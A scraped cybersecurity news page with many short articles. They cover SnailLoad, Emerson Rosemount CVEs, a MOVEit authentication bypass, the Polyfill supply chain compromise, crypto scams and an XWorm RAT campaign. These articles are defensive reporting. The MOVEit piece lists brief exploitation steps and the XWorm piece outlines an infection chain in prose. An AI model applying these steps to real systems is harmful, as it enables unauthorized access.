Normal view
- Cybersecurity News and Magazine
- TCE Cyberwatch: Kaspersky Lab banned in the U.S. and military grade cybersecurity being utilised by corporations.
- Cybersecurity News and Magazine
- Top 5 Skills to Future-Proof Your Career in the Artificial Intelligence Era
Top 5 Skills to Future-Proof Your Career in the Artificial Intelligence Era
As Artificial Intelligence (AI) continues to transform industries worldwide, tech enthusiasts must equip themselves with the right skillsets to stay relevant and competitive. The swift evolution of AI technologies is altering job roles, opening up new career opportunities, and establishing benchmarks for the future of employment. Whether you're a budding developer or an experienced IT professional, mastering these key skills will enable you to excel in an AI-dominated environment.
Skills to Master in the Era of Artificial Intelligence
- Understanding the fundamentals of AI/ML - AI and ML are at the core of today’s technological innovations. From automating routine tasks to enabling sophisticated data analysis, these technologies are driving the next wave of digital transformation. A deep understanding of AI principles and machine learning techniques is crucial for anyone looking to future-proof their career. Aspirants must learn the basics of AI and its implementation in real-world scenarios.
- Building proficiency in Data Analysis - In the AI era, data is often referred to as the new black gold. The ability to analyse and interpret data is invaluable, as it forms the foundation for AI and machine learning models. Data science skills enable tech enthusiasts to derive actionable insights from vast datasets, driving informed decision-making. Hence, aspirants must focus on understanding key statistical methods for analysing data, including regression, hypothesis testing, and probability, and build proficiency in data visualization tools such as Tableau, Matplotlib, and Seaborn.
- Learn advanced programming skills - Programming remains a fundamental skill in the tech world. As AI continues to evolve, the demand for advanced programming skillsets is rising exponentially. Tech enthusiasts need to be proficient in writing efficient, scalable code to develop complex AI systems and applications. Aspirants should try to gain expertise in languages like Python, which is widely used in AI and ML. They must also gain a good understanding of languages such as Java, C++, and JavaScript. They should also try to become proficient in algorithms, data structures, and their applications in problem-solving.
- Cloud Computing and AI Integration - Cloud computing has revolutionized the way we build and deploy AI solutions. Understanding how to leverage cloud platforms is crucial for developing scalable AI applications and managing big data.
- Cybersecurity Awareness and Skills - As AI systems become more integrated into our daily lives, the need for robust cybersecurity measures becomes increasingly important. Cybersecurity skills are essential for protecting data, ensuring the integrity of AI systems, and mitigating risks associated with cyber threats. Aspirants keen on building skillsets in these, must begin by understanding the basics of cybersecurity in terms of threat modelling, encryption, and network security. They should also learn about the unique security challenges posed by AI systems, such as adversarial attacks and data poisoning.
Conclusion
The AI era presents both challenges and opportunities for tech enthusiasts. By developing these essential skills, you can future-proof your career. Embrace the continuous learning journey, stay curious, and keep adapting to the advancements in AI and related technologies.
Challenges Faced By Data Centers In Adopting Liquid Cooling
Cybersecurity Risks of Data Center Liquid Cooling Systems
Liquid cooling systems — while enhancing efficiency in data centers — introduce cybersecurity challenges demanding attention from industry experts. These systems present new vulnerabilities malicious actors can exploit.Data Breaches
Attackers can intercept and manipulate sensor data in liquid cooling systems by exploiting vulnerabilities in the interconnected IoT devices that monitor and control these systems. By gaining unauthorized access, they can alter critical sensor readings, cause disruptions in temperature regulation and lead to hardware damage or system shutdowns. According to a recent survey, 36% of respondents reported that their worst breach in the past three years cost $1 million or more. This number underscores the severe financial implications of such attacks. These systems’ interconnectedness amplifies the risks because compromised sensors can provide a gateway to broader network infiltration. This can lead to widespread operational and security consequences for data centers.Network Vulnerabilities
IoT devices in data center liquid cooling systems can be entry points for cyberattacks due to their connectivity and often insufficient security measures. Attackers can exploit these devices — integral to monitoring and managing cooling processes — to access the broader network. Alarmingly, 93% of external cyberattacks successfully breach organizational networks and access information within IoT systems, illustrating the prevalent risks. These cooling systems' remote access and control features also present significant vulnerabilities. Unauthorized individuals can manipulate system settings, disrupt operations and cause physical damage. These factors compromise the data center's overall security and functionality.Malware and Ransomware
Malware can significantly disrupt cooling operations in data centers by targeting the control systems that regulate temperature and manage liquid flow. By infecting these systems, malware can alter operational parameters and cause overheating or shutdowns, leading to critical system failures. In 2023, organizations worldwide detected over 317 million ransomware attempts, highlighting the persistent threat landscape. Ransomware attacks on data center liquid cooling systems are particularly concerning because attackers can turn off these systems and demand ransom payments to restore functionality. Such disruptions threaten the data center's physical integrity and pose severe financial and operational risks. That makes it imperative for organizations to enhance their cybersecurity defenses against these sophisticated threats.Physical Risks of Data Center Liquid Cooling Systems
While cybersecurity threats are a significant concern, the physical risks associated with liquid cooling systems are equally critical. Here are examples that can severely impact data center operations.Environmental Threats
Cooling system failures in data centers can lead to rapid temperature increases, jeopardizing the integrity of sensitive hardware components. Excessive heat can also cause servers and other critical equipment to malfunction or fail, which can result in data loss and significant operational downtime. Additionally, contaminants entering the liquid cooling system — such as particulate matter or chemical impurities — can clog or corrode essential parts, further exacerbating the risk of hardware damage. These issues threaten the data center infrastructure’s physical health and necessitate costly repairs and replacements. They underscore the importance of maintaining robust and clean cooling systems to ensure optimal performance and reliability.Hardware Failures
Liquid leaks in data centers pose significant risks of hardware damage and data loss. For instance, an incident at Global Switch’s data center in Paris — where a leak in the battery room sparked a fire — caused Google services throughout Europe to go down. Such leaks can result in short circuits, corrosion and other physical damage to critical components, leading to substantial downtime and financial losses. Maintaining data center liquid cooling systems involves complex procedures, including regular inspections, leak detection and fluid replacement, each of which presents a set of risks. Improper maintenance or undetected leaks can escalate into severe problems. This highlights the need for rigorous protocols and advanced monitoring solutions to safeguard against these threats and ensure data center reliability.Physical Security
Physical tampering with data center liquid cooling systems presents significant security risks, as unauthorized alterations can disrupt operations and compromise system integrity. Malicious insiders — such as disgruntled employees or contractors with access to these systems — can exploit their physical access to manipulate settings, introduce contaminants or turn off cooling mechanisms. Such actions can lead to overheating, hardware failures and extended downtime, severely impacting data center performance and security. The potential for insider threats underscores the necessity for strict access controls, thorough background checks and continuous monitoring of personnel activities. These factors prevent and quickly respond to attempts at physical sabotage.Mitigation Strategies
Addressing the security threats of data center liquid cooling systems requires a multifaceted approach. Here’s how organizations can significantly reduce the risks and ensure system integrity.Physical Security Measures
Design improvements are crucial to minimize leakage and damage risks in liquid cooling systems. For example, investing in linear movement solutions can precisely position components within the system. It enhances efficiency and productivity while reducing the likelihood of leaks. Additionally, robust sealing technologies and materials can further mitigate the risk of fluid escape. Advanced environmental monitoring systems are also advisable because they provide real time temperature, humidity and potential contaminants data. This information allows prompt detection and response to anomalies. These proactive measures ensure cooling operations' reliability and safety, safeguarding critical data center infrastructure.Cybersecurity Measures
Securing IoT devices and network endpoints in liquid cooling systems involves implementing best practices such as robust encryption, regular firmware updates and strong authentication mechanisms. Network segmentation can also help isolate critical systems from potential threats. Likewise, continuous monitoring and auditing of cooling systems are essential to promptly detect and respond to security incidents. Organizations can maintain vigilance over their network by employing real time analytics and intrusion detection systems to identify and address anomalies. Regular audits further reinforce security by identifying vulnerabilities and ensuring compliance with security protocols.Prioritizing the Security of Data Center Liquid Cooling Systems
Industry experts must prioritize robust security measures and remain vigilant about evolving threats to ensure the resilience of liquid cooling systems. Future advancements in AI-driven monitoring and smart materials promise to enhance these systems’ safety and efficiency, further mitigating security risks- Cybersecurity News and Magazine
- SnailLoad Allows Attackers to Trace Visited Websites By Measuring Network Latency
SnailLoad Allows Attackers to Trace Visited Websites By Measuring Network Latency
How The SnailLoad Exploit Works
SnailLoad takes advantage of the bandwidth bottleneck present in most internet connections. When a user's device communicates with a server, the last mile of the connection is typically slower than the server's connection. An attacker can measure delays in their own packets sent to the victim to deduce when the victim's connection is busy. [caption id="attachment_79548" align="alignnone" width="1287"] Source: snailload.com[/caption] The attack masquerades as a download of a file or any website component (like a style sheet, a font, an image or an advertisement). The attacking server sends out the file at a snail's pace, to monitor the connection latency over an extended period of time. The researchers decided to name the technique 'SnailLoad' as "apart from being slow, SnailLoad, just like a snail, leaves traces and is a little bit creepy." The attack requires no JavaScript or code execution on the victim's system. It simply involves the victim loading content from an attacker-controlled server that sends data at an extremely slow rate. By monitoring latency over time, the attacker can correlate patterns with specific online activities. The researchers have shared the conditions required to recreate the SnailLoad attack:- Victim communicates with the attack server.
- Communicated server has a faster Internet connection than the victim's last mile connection.
- Attacker's packets sent to victim are delayed if the last mile is busy.
- Attacker infers website visited or video watched by victim through side-channel attack.
SnailLoad Implications and Mitigation
In testing, SnailLoad was able to achieve up to 98% accuracy in identifying YouTube videos watched by victims. It also showed 62.8% accuracy in fingerprinting websites from the top 100 most visited list. While not currently observed in the wild, SnailLoad could potentially affect most internet connections. Mitigation is challenging, as the root cause stems from fundamental bandwidth differences in network infrastructure. The researchers stated that while adding random noise to the network can reduce the accuracy of the attack, it could impact performance and cause inconvenience to users. As online privacy concerns grow, SnailLoad highlights how even encrypted traffic could potentially be exploited to leak information through subtle timing differences. Further research could be required to develop effective countermeasures against this new class of remote side-channel attacks.- Cybersecurity News and Magazine
- Researchers Uncover Flaws in Widely Used Emerson Rosemount Industrial Gas Chromatographs
Researchers Uncover Flaws in Widely Used Emerson Rosemount Industrial Gas Chromatographs
Flaws in Emerson Rosemount Gas Chromatographs
Operational technology security firm Claroty discovered the vulnerabilities, which include two command injection flaws and two authentication bypass issues. If exploited, these flaws could enable unauthenticated attackers to run arbitrary commands, access sensitive data and gain administrative control. [caption id="attachment_79530" align="alignnone" width="649"] Source: Wikipedia[/caption] [caption id="attachment_79525" align="alignnone" width="1476"] Emulated system (Source: claroty.com)[/caption] To study the Emerson Rosemount 370XA gas chromatograph, commonly used in industrial settings for gas analysis, the researchers took efforts to emulate the systems. This complex process was undertaken because the physical device could cost over $100,000 while the research was limited to a six-week project. The emulation process involved download and extraction of the device firmware from the official Emerson Rosemount website, and a search for an application that could implements its proprietary protocols. The researchers used the QEMU emulator to emulate the PowerPC architecture used by the gas chromatograph and run the extracted firmware. Upon investigation, the researchers were able to uncover four key vulnerabilities:- CVE-2023-46687: Allows remote execution of root-level commands without authentication (CVSS score: 9.8)
- CVE-2023-49716: Enables authenticated users to run arbitrary commands remotely (CVSS score: 6.9)
- CVE-2023-51761: Permits unauthenticated users to bypass authentication and gain admin access by resetting passwords (CVSS score: 8.3)
- CVE-2023-43609: Allows unauthenticated users to access sensitive information or cause denial-of-service (CVSS score: 6.9)
Industry Impact and Mitigation
Gas chromatographs play a crucial role in various sectors, from environmental monitoring to medical diagnostics. Compromised devices could have far-reaching consequences. In food processing, attacks on chromatographs might prevent accurate bacteria detection, halting production. In healthcare settings, disrupted blood sample analysis could impact patient care. Emerson has released updated firmware addressing these vulnerabilities. The Claroty researchers said they "appreciate Emerson for its swift response and cooperation, which demonstrates their dedication to our shared goal." Emerson advises customers to apply the patches and implement best practices in the cybersecurity industry according to current standards. The firm stated, "In addition, Emerson recommends end users continue to utilize current cybersecurity industry best practices and in the event such infrastructure is not implemented within an end user’s network, action should be taken to ensure the Affected Product is connected to a well-protected network and not connected to the Internet. In its advisory CISA shared the following recommendations for securing these systems:- Minimize network exposure: Ensure that control system devices and/or systems, are not publicly accessible from the internet.
- Locate control system networks: Place remote devices behind firewalls and isolate them from business networks
- Secure Remote Access: Use Virtual Private Networks (VPNs) to secure remote access. However, the agency also warned of potential inherent risks in VPNs, asking organizations and businesses to be aware of them.
- Cybersecurity News and Magazine
- Scammers Promoted Fake Donald Trump Live Stream Urging Cryptocurrency Donations During Presidential Debate
Scammers Promoted Fake Donald Trump Live Stream Urging Cryptocurrency Donations During Presidential Debate
Fake Trump Cryptocurrency Promotion Scam Streamed Ahead of Presidential Debate
The timing of the fake live stream coincided with the scheduled debate this week between current U.S. President Joe Biden and former President and challenger Donald J. Trump. Scammers behind the campaign appeared to be taking advantage of actual statements made by Trump supporting cryptocurrency in the past, coupled with a repeated AI-generated video where he sits alongside popular YouTuber Logan Paul to speak about promoting cryptocurrency within the United States if elected. [caption id="attachment_79454" align="alignnone" width="1351"] Screenshot taken from the livestream.[/caption] The fake video appears to stem from an edit of a podcast video where Trump joined the YouTuber to speak on various issues, including the election, U.S. politics, his personal life and his opponent. The edited fake video shared a QR code and website (donaldtrump[.]gives) where viewers could be tricked into making donations. The website incorporates official Trump campaign branding for the 2024 presidential election, sharing instructions for participation in the "unique event," a multiplier to lure visitors with calculations on how much cryptocurrency they would receive in return for their donation, and a "live" feed of ongoing donations made to the shared cryptocurrency addresses. [caption id="attachment_79477" align="alignnone" width="690"] Cryptocurrency addresses involved with the scam[/caption] "During this unique event, you have the opportunity to take a share of 2,000 BTC & 50,000 ETH & 500,000,000 DOGE & 50,000,000 USDT. Have a look at the rules and don't miss out on this. You can only participate once!" the scam website stated. According to details from a WhoIs lookup, the website appears to have been registered on June 27th, the same day as the Presidential debate, using a Russian registrant.YouTube Channel Connected To Scam Taken Down
The YouTube channel behind this promotion was taken down shortly after a report to YouTube, but the website promoted during the stream still appears to be up and running. The channel was noted to have about 1.38 million subscribers before its takedown, nearly half the subscriber count (2.9 million) for the official Donald J Trump YouTube channel. [caption id="attachment_79462" align="alignnone" width="606"] Email confirmation of Channel takedown[/caption] It is unknown if the live transaction feed featured on the scam website reflects actual real-time transactions. The full extent and the victim count from this cryptocurrency scam is unknown; details of the campaign have been sent to CRIL (Cyble Research and Intelligence Labs) researchers for further investigation. [caption id="attachment_79474" align="alignnone" width="2604"] Screenshot of alleged transactions[/caption] The campaign highlights the threat of Artificial Intelligence content to election-related processes, legitimate campaign donations and impersonation of candidates or well-known figures. In a recent incident, crypto scammers had taken over the YouTube channel of Channel 7 News Australia to use a deepfake Elon Musk to promote dubious crypto investments.- Cybersecurity News and Magazine
- Data Security Officer from Philippines Admits to Hacking 93 Different Websites
Data Security Officer from Philippines Admits to Hacking 93 Different Websites
Implications for Philippines National Security
Kangkong's hacking spree exposed significant vulnerabilities in the cybersecurity measures of various organizations. Among the high-profile targets were the peacekeeping operations center website of the Armed Forces of the Philippines, the mail server of the National Security Council, and the Join the PH Army website. The hacker along with two others individuals were arrested by the National Bureau of Investigation (NBI) Cybercrime Division on June 19 after reports of multiple unauthorized access attempts and breaches on websites. [caption id="attachment_79338" align="alignnone" width="1200"] Arrested data officer Kangkong (Source: www.onenews.ph)[/caption] The hacker acknowledged the serious consequences of his actions, including the potential exposure of sensitive data of soldiers to foreign entities. "That's when I realized that we have many enemies and we should not be going against each other," Kangkong stated. The officer revealed in an interview with ABS-CBN that he had left specific pictures on compromised websites as proof of his involvement.Senior Technology Officer May Be Implicated
In his extrajudicial confession, Kangkong initially implicated Art Samaniego, Manila Bulletin's senior technology officer, as the person who ordered the hacking of several websites. However, he later expressed regret for this claim. Samaniego has denied allegations that he ordered the hacking to boost his social media reach. The NBI Cybercrime Division has issued a subpoena for Samaniego to explain his side to the authorities. Meanwhile, the Manila Bulletin has suspended Samaniego pending an internal investigation. Kangkong also highlighted the inadequate cybersecurity measures in place for government and private companies' websites, stating that this was a key factor in his ability to hack them. He urged organizations to invest in security measures to prevent similar breaches in the future. Kangkong's confession highlights the urgent need for improved cybersecurity measures in the Philippines. He emphasized that inadequate security was a key factor in his ability to breach these websites. "Cybersecurity is not really a priority in the Philippines," he stated, urging organizations to invest in better security measures despite the associated costs.- Cybersecurity News and Magazine
- Recently Disclosed Progress MOVEit Transfer Flaw Observed Being Actively Exploited
Recently Disclosed Progress MOVEit Transfer Flaw Observed Being Actively Exploited
Progress MOVEit Vulnerability Details
WatchTowr Labs was sent details of the vulnerability by a user who identified as 'dav1d_bl41ne' on its IRC channel, an unusual method of vulnerability sharing, the researchers noted. The researchers decided to investigate further, setting up a test environment to replicate the vulnerability. [caption id="attachment_79318" align="alignnone" width="471"] Source: labs.watchtowr.com[/caption] The debugger output from the test environment showed that the server was throwing exceptions and attempting to access files in unexpected ways. Upon further investigation, the researchers discovered that the vulnerability could be exploited by providing a valid file path instead of the SSH public key during authentication. This led to the server attempting to access the file, giving the attacker unauthorized access to the system. The researchers shared the following steps on exploiting the vulnerability:- Upload a public key to the File Transfer server.
- Rather than supplying a legitimate public key, send a file path to the public key, signing the authentication request with the same public key.
- The key will be accepted by the server with successful login, allowing for the access of target files.
- Block public inbound RDP access to MOVEit Transfer server(s).
- Limit outbound access on MOVEit Transfer server(s) to only trusted endpoints.
Implications of the MOVEit Vulnerability
The discovery of this vulnerability soon after major exploitation last year has reignited discussions about the security of file transfer solutions in enterprise environments. The potential for unauthorized access to sensitive files could have far-reaching consequences for the large number of enterprises that rely on MOVEit Transfer. While the full extent of the vulnerability's impact is still being assessed, the incident has sparked more debate about responsible disclosure practices in the cybersecurity community. Some argue that early, private notifications to affected parties are crucial, while others advocate for more transparent, public disclosures to ensure widespread awareness and prompt action. As the situation develops, IT administrators and security professionals are advised to stay vigilant, monitor for any signs of exploitation, and implement recommended security measures to protect their MOVEit Transfer deployments.- Cybersecurity News and Magazine
- Scammers Spotted Promoting Fake Olympics Cryptocurrency With AI Generated Imagery
Scammers Spotted Promoting Fake Olympics Cryptocurrency With AI Generated Imagery
Olympics Initial Coin Offerings (ICO) Fraud
Researchers from Trend Micro uncovered a recent scheme that claimed to offer an official "Olympics Games Token" for sale. The Olympic Games Token ICO website, theolympictoken[.]com, was registered on March 30, 2024, and its website went live a day later. The website also links to a legitimate Olympics 2024 logo and a countdown to the event, making it seem like a legitimate project. [caption id="attachment_79264" align="alignnone" width="395"] Source: trendmicro.com[/caption] It linked to a "whitepaper" – a document explaining the project's tech and goals. But that link led nowhere useful. Instead of details, it dumped visitors on the official Olympics website. Red flag number one. A Twitter account and Telegram channel pushed followers to buy tokens ASAP. When the original site got shut down, a near-identical one (olympictokensolana[.]com) popped up under a new name. The researchers spotted at least ten other websites using 2024 Olympics-associated branding to lure victims into ICO scams; some of them were shut down shortly after their discovery.Use of AI-Generated Images Olympics in ICO Scams
[caption id="attachment_79257" align="alignnone" width="1263"] Source: trendmicro.com[/caption] The researchers remarked that AI-generated images are becoming increasingly common in such ICO scams, as they offer a cost-effective and time-efficient way to create convincing lures. Cybercriminals can use AI to generate text, correct spelling and grammatical errors, and even create sentences in languages they do not speak. [caption id="attachment_79256" align="alignnone" width="384"] Source: trendmicro.com[/caption] The researchers spotted at least three other ICO Olympics scam websites employing the usage of AI-generated imagery for promotion.Spotting Fake ICO Campaigns
ICOs have gained significant attention as cryptocurrency continues to be adopted in various industries. While most new tokens lack utility and are simply memecoins, it does not always mean they are scams. Investors should be vigilant and look out for potential scams and rug-pulls. A legitimate ICO should have a proper website and social media presence, a transparent team, an active community, a comprehensive whitepaper, legitimacy of claims, token distribution, smart contract audit, and liquidity management. The researchers have shared the following guidelines to help identify such scams:- Proper website and social media presence: The researchers stated that scam sites are often poorly designed or lack active presence on social media.
- Transparent team: Cross-check the identities and credentials of the teams behind the offering. Anonymity is a red flag.
- Active community: Genuine projects have engaged followers on platforms like Discord, Twitter or Telegram, which suggests genuine interest and support.
- Comprehensive whitepaper: A whitepaper that outlines the project's goals, utility, and technical aspects, which demonstrates a thorough understanding of the project's concept and planning.
- Legitimacy of claims: Claims backed by verifiable evidence, such as partnerships, use cases, and endorsements.
- Token distribution: Avoid projects with highly concentrated token ownership which might increase the chances of exit scams.
- Smart contract audit: Audit by reputable third-parties, which identify vulnerabilities.
- Liquidity management: Liquidity is locked to prevent premature withdrawals and is decentralized among the community, which secures investors' funds.
- Cybersecurity News and Magazine
- South Korean ISP Accused of Installing Malware on Devices of 600,000 Who Used Torrenting Services
South Korean ISP Accused of Installing Malware on Devices of 600,000 Who Used Torrenting Services
Malware Infiltrated Systems of Torrenting Subscribers
The incident came to light in May 2020 when numerous web hard drives suddenly stopped working. Users flooded company forums with complaints about unexplained errors. An investigation revealed that malware had infiltrated the "Grid Program," software that enables direct data exchange between users. [caption id="attachment_79121" align="alignnone" width="2800"] Source: mnews.jtbc.co.kr[/caption] The malware, which was designed to interfere with BitTorrent traffic, was allegedly used to monitor and control the internet activities of KT subscribers. The police believe that the motive behind this hacking was to reduce network-related costs, as torrent transfers can be costly for internet service providers. KT, however, claims that it was merely trying to manage traffic on its network to ensure a smooth user experience. KT instead stated that the Webhard services were malicious, however after the the Gyeonggi Southern District Office conducted raids on KT facilities, they believe the ISP may have violated communications and network laws. A police follow-up investigation stated that KT operated a dedicated team responsible for developing, distributing, and operating the malware program. The hacking was traced to KT's Bundang IDC Center, one of its data centers. Over five months, an estimated 20,000 PCs were infected daily. The malware reportedly created strange folders, made files invisible, and disabled web hard programs.Legal and Ethical Implications
KT and Webhard companies have a history of conflict, including lawsuits. While a previous court ruled in KT's favor regarding traffic blocking of grid services, the current situation differs significantly. KT was alleged to have planted malicious code on individual users' PCs without consent or explanation. South Korean legal experts question KT's methods, suggesting the company could have pursued formal procedures through its legal team instead of resorting to hacking. The incident raises serious concerns about privacy, corporate responsibility, and the extent to which internet service providers can control network traffic. The scandal has also raised concerns about the security of KT's customers' data, with many wondering what other sensitive information may have been compromised. The company's CEO has since resigned, and the company's reputation has taken a significant hit. Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.Polyfill Supply Chain Attack Compromises Over 100,000 Websites
Malicious Polyfill Injection and Its Impact
Researchers stated that the injected malware is dynamically generated based on HTTP headers, making it difficult to detect. The Polyfill injection attack is a classic example of a supply chain attack against a widely used library. [caption id="attachment_79097" align="alignnone" width="2454"] At least 104183 websites might be affected. (Source: publicwww.com)[/caption] The compromised Polyfill code dynamically generates malware based on HTTP headers, potentially utilizing multiple attack vectors. Researchers from Sansec decoded one variant that redirects mobile users to a sports betting site using a fake Google Analytics domain. The malware employs sophisticated techniques and defenses against reverse engineering to evade detection, including:- Activating only on specific mobile devices at certain hours
- Avoiding execution when an admin user is detected
- Delaying activation when web analytics services are present
Mitigation and Recommendations
Andrew Betts, the original Polyfill author, took to X to advise against the usage of Polyfill altogether, stating that modern browsers no longer require it. He added that he had no influence over the sale of the project and was never in possession of the new domain, and cautioned that websites that serve third-party scripts are a huge security concern. [caption id="attachment_79101" align="alignnone" width="623"] Source: X.com(@triblondon)[/caption] [caption id="attachment_79102" align="alignnone" width="634"] Source: X.com(@triblondon)[/caption] Experts have set up a domain (polykill.io) to warn against the compromise of the project and have recommend the following steps for website owners:- Immediately and remove usage of cdn.polyfill.io from websites and projects.
- Replace with a secure alternative such as those being offered by Fastly and CloudFlare. Fastly has saved and hosted an earlier version(https://polyfill-fastly.io/) of the project's codebase before its sale to Funnull.
"There are many risks associated with allowing an unknown foreign entity to manage and serve JavaScript within your web application. They can quietly observe user traffic, and if malicious intent were taken, they can potentially steal usernames, passwords and credit card information directly as users enter the information in the web browser."CloudFlare had also published its findings and recommendations in response to concerns over the compromise of domains. The company stated in a blog article:
The concerns are that any website embedding a link to the original polyfill.io domain, will now be relying on Funnull to maintain and secure the underlying project to avoid the risk of a supply chain attack. Such an attack would occur if the underlying third party is compromised or alters the code being served to end users in nefarious ways, causing, by consequence, all websites using the tool to be compromised."This incident serves as a stark reminder of the security implications of relying on external code libraries/third-party scripts and the importance of vigilance in maintaining website integrity, plus the potential malicious takeover of massively deployed projects. Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.
- Cybersecurity News and Magazine
- Microsoft Engineer Accidentally Leaked 4GB of PlayReady DRM Internal Code Used To Protect Streaming Services
Microsoft Engineer Accidentally Leaked 4GB of PlayReady DRM Internal Code Used To Protect Streaming Services
PlayReady DRM Internal Code Leak
In early June, a Microsoft engineer had published information about an Apple TV service crash on a Surface Pro 9 device in a public forum. The shared data included a 771MB file attachment that revealed 4GB of internal code related to Microsoft PlayReady upon extraction. [caption id="attachment_79066" align="alignnone" width="1920"] Original Post Before Deletion (Source: security-explorations.com)[/caption] The leaked PlayReady data is said to include: 1. WarBird configurations for creating the PlayReady library 2. WarBird libraries for code obfuscation functions 3. Libraries with symbolic information related to PlayReady [caption id="attachment_79063" align="alignnone" width="1428"] Partial Directory View of Leaked Data (Source: security-explorations.com)[/caption]HD Keys Could Be Decrypted
Researchers from cybersecurity company AG Security Research Lab managed to successfully build the required Windows PlayReady DLL library from the leaked internal code, aided by step-by-step instructions provided by another user on the same forum. Their investigation uncovered several deficiencies in Protected Media Path (PMP) components of PlayReady, which could be exploited to access plaintext content keys secured by the system on Windows 10 and 11 systems. The researchers demonstrated that these extracted keys could successfully decrypt high-definition movies protected by PlayReady. Notably, the vulnerability persists even on systems with hardware DRM capabilities, as this feature can be easily disabled. The root cause appears to lie in the software DRM implementation used by default on Windows 10 systems without hardware DRM capability. Given that Windows 10 still holds a 69% market share worldwide, this vulnerability could potentially affect a significant number of users until the operating system's retirement in October 2025. The team also demonstrated that the technique used to extract plaintext values of content keys could work for other platforms relying on SW Microsoft PlayReady technology in a Windows OS environment.Implications and Microsoft's Response
The researchers had notified Microsoft about the leak on June 12, 2024. While Microsoft removed the forum post within 12 hours, the download link reportedly remained active. On June 26, MSRC stated to the researchers that it had conducted an investigation and determined that the incident was not a vulnerability to service as the post had already been taken down. The researchers confirmed that the download link no longer remains active. The incident highlights the ongoing challenges in maintaining the security and secrecy of DRM implementations. It also underscores the importance of adhering to guidelines for handling sensitive information in public forums, as the leak violated Microsoft's own guidelines for posting link reproduction information publicly. These guidelines specify:- All information in reports and any comments and replies are publicly visible by default.
- Don't put anything you want to keep private in the title or content of the initial report, which is public.
- To maintain your privacy and keep your sensitive information out of public view, exercise caution.
Major Streaming Services Potentially Affected
The same research team had earlier tested Microsoft's Protected Media Path and had discovered several streaming platforms were affected by vulnerabilities within the environment: Canal+ Online, Netflix, HBO Max, Amazon Prime Video, Sky Showtime, and others. DRM protection is crucial to the video streaming industry, which is valued at $544 billion, making this security breach a matter of serious concern. Microsoft reportedly demonstrated interest in a full disclosure of the stated vulnerabilities and technical details along with Proof of Concept over its MSRC channel, offering potential rewards for the disclosure. However, the researchers declined, as they felt a full disclosure would have to include a commercial agreement, would jeopardize their own confidential technology and tools along with future research on the Windows operating system. The researchers also believed that Microsoft should focus on conducting a more comprehensive review of its Protected Media Path environment, which could result in the discovery and fixing of additional issues rather than focusing on a single exploit. Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.- Cybersecurity News and Magazine
- Cyber Attack Forces South Africa’s National Health Laboratory Service To Shut Down Systems
Cyber Attack Forces South Africa’s National Health Laboratory Service To Shut Down Systems
Impact on South Africa's National Health Laboratory Service
NHLS Chief Executive Officer Prof Koleka Mlisana informed staff of the incident in a memo, stating that the breach had caused damage and that the organization was treating the matter with extreme urgency and concern. Milsana stated, “I regret to inform you that our IT systems are unavailable due to a suspected incident that occurred over the weekend.” Mlisana assured staff that the organization's Incident Response Team was working around the clock to determine the scope of the intrusion and deploy the necessary safeguards to secure systems and data. The NHLS has implemented its "Downtime Protocol" to minimize disruption to services, prioritizing patients' samples and processing, with results communicated directly to clinicians whenever urgent. The cyber attack comes at a critical time for South Africa's healthcare system. The country is currently grappling with a Mpox outbreak, and the NHLS was already facing a significant backlog in toxicology tests as of March. The shutdown of IT systems is likely to exacerbate these challenges. Mzi Gcukumana, the NHLS Communication, Marketing, and PR officer, disclosed: “Preliminary investigation suggests that our Enterprise Resource Planning (Oracle) environment, Laboratory Information System (LIS) (TrakCare) database, and CDW are not affected. Therefore, no patient data has been lost or compromised. All patient data is safe."Response and Recovery Efforts
“Please rest assured that our priority focus is on data security. We are determined to solve this issue swiftly and transparently,” Milsana stated to patients. In response to the breach, the NHLS has deployed its Incident Response Team to assess the scope of the intrusion and implement necessary safeguards. Mlisana assured staff that the team is working around the clock to secure systems and data. “I want to take this opportunity to thank you in advance as we all put in our efforts to ensure that disruption to our services is minimised,” Milsana added. The NHLS had determined that that certain sections of its systems, including its backup server were deleted, requiring the rebuilding of affected systems. Gcukumana stated, “All users will be aware that the NHLS networked laboratory system is heavily reliant on these information technology systems that have been disrupted.” He added, “Unfortunately, this will take time, and investigations thus far have not advanced enough for us to give a timeframe for the restoration of our systems and full service. All stakeholders and the public will be informed as soon as more information becomes available.” The National Department of Health, which oversees the NHLS, has been informed of the incident. A spokesperson for the department called for patience as efforts to resolve the issue continue. As the investigation unfolds, the NHLS has promised regular updates on the compromise and ongoing response activities. The organization emphasizes its commitment to data security and swift, transparent resolution of the issue. Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.Russian Hackers Target Ukraine with XWorm RAT Malware Payload
Technical Overview of XWorm RAT Campaign
The campaign begins with a malicious LNK shortcut file, disguised as a legitimate Excel document, which executes a PowerShell script upon execution. The script downloads two files, "pkg.zip" and "NewCopy.xlsx", from a specified URL. The LNK shortcut file then executes "pythonw.exe" using the start command, which duplicates files and stores them in a new folder. The "pythonw.exe" loads a malicious DLL, "python310.dll", through DLL sideloading, injecting shellcode into the MSBuild process. [caption id="attachment_78917" align="alignnone" width="1529"] Source: Cyble[/caption] The hackers use a technique called DLL sideloading, where a malicious library file masquerades as a legitimate one. This allows the attackers to run their code under the guise of trusted software. Additionally, they employ a tool called Shadowloader to inject the XWorm RAT into a running process, further obscuring its presence. The XWorm RAT is then executed, offering a range of capabilities, including data theft, DDoS attacks, and cryptocurrency address manipulation. The malware attempts to connect to a Command-and-Control (C&C) server, but at the time of analysis, the server was inactive, resulting in no observed malicious activities. [caption id="attachment_78919" align="alignnone" width="537"] Source: Cyble[/caption] While the initial infection vector remains unclear, researchers suspect phishing emails may play a role. The intended victim could not be ascertained from accessing the the Excel lure used in the campaign. CRIL researchers had previously observed the UAC-0184 threat actor group employing lures tailored to appeal to Ukrainian targets, often mimicking official government or utility communications.Protecting Against XWorm RAT
The XWorm RAT malware employed in the campaign is designed to be easily accessible even to to threat actors lacking sophistication and technical expertise. The versatile malware offers several functionalities, including data theft, DDoS attacks, cryptocurrency address manipulation, ransomware deployment, and downloading additional malware onto compromised systems. Cyble researchers have recommended several measures to defend against this campaign:- Implement strong email filtering to block malicious attachments.
